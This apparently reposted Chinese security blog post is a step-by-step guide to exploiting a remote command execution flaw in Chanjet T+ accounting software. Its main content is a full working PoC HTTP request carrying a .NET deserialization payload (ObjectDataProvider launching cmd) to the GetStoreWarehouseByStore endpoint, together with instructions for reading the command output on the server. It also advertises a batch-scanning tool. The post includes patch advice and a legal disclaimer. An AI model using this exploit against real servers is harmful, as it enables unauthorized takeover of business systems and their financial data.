实战|手把手教如何利用畅捷通t+命令执行漏洞

admin 2023年10月12日13:32:16评论23 views字数 1993阅读6分38秒阅读模式

hello,大家好,我是丁永博,继去年的文件上传漏洞,今年我们再更新一下畅捷通的远程命令执行漏洞。(影响范围:T+ 13.0 、16.0)

“T+”是一款灵动、智慧、时尚的互联网◎管理软件,主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。 

实战|手把手教如何利用畅捷通t+命令执行漏洞

GetStoreWarehouseByStore 存在 .net反序列化漏洞,导致远程命令执行,控制服务器。通过X-Ajaxpro-Method(用于指定在Ajax请求中要调用的服务器端方法的名称)调用GetStoreWarehouseByStore 。

poc:

POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1Host: X-Ajaxpro-Method: GetStoreWarehouseByStoreUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: ASP.NET_SessionId=b30jr3u304kv0ueugn21vjke; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1697072948; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1697072948Upgrade-Insecure-Requests: 1Content-Length: 591
{ "storeID":{ "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35", "MethodName":"Start", "ObjectInstance":{ "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", "StartInfo": { "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", "FileName":"cmd", "Arguments":"/c whoami > test.txt" } } }}

实战|手把手教如何利用畅捷通t+命令执行漏洞

访问/tplus/test.txt文件,查看命令执行结果

实战|手把手教如何利用畅捷通t+命令执行漏洞

批量检测工具:放在知识星球

实战|手把手教如何利用畅捷通t+命令执行漏洞

实战|手把手教如何利用畅捷通t+命令执行漏洞

目前官方已发布补丁更新,建议受影响用户尽快安装 16.000.000.0283 及以上补丁包:

https://www.chanjetvip.com/product/goods/detail?id=6077e91b70fa071069139f62

实战|手把手教如何利用畅捷通t+命令执行漏洞

小知识




依据《刑法》第285条第3款的规定,犯提供非法侵入或者控制计算机信息系罪的,处3年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处3年以上7年以下有期徒刑,并处罚金。


实战|手把手教如何利用畅捷通t+命令执行漏洞

声明



本文提供的技术参数仅供学习或运维人员对内部系统进行测试提供参考,未经授权请勿用本文提供的技术进行破坏性测试,利用此文提供的信息造成的直接或间接损失,由使用者承担。

实战|手把手教如何利用畅捷通t+命令执行漏洞


欢迎 在看留言分享至朋友圈 三连

 好文推荐  

原文始发于微信公众号(丁永博的成长日记):实战|手把手教如何利用畅捷通t+命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月12日13:32:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战|手把手教如何利用畅捷通t+命令执行漏洞https://cn-sec.com/archives/2106087.html

发表评论

匿名网友 填写信息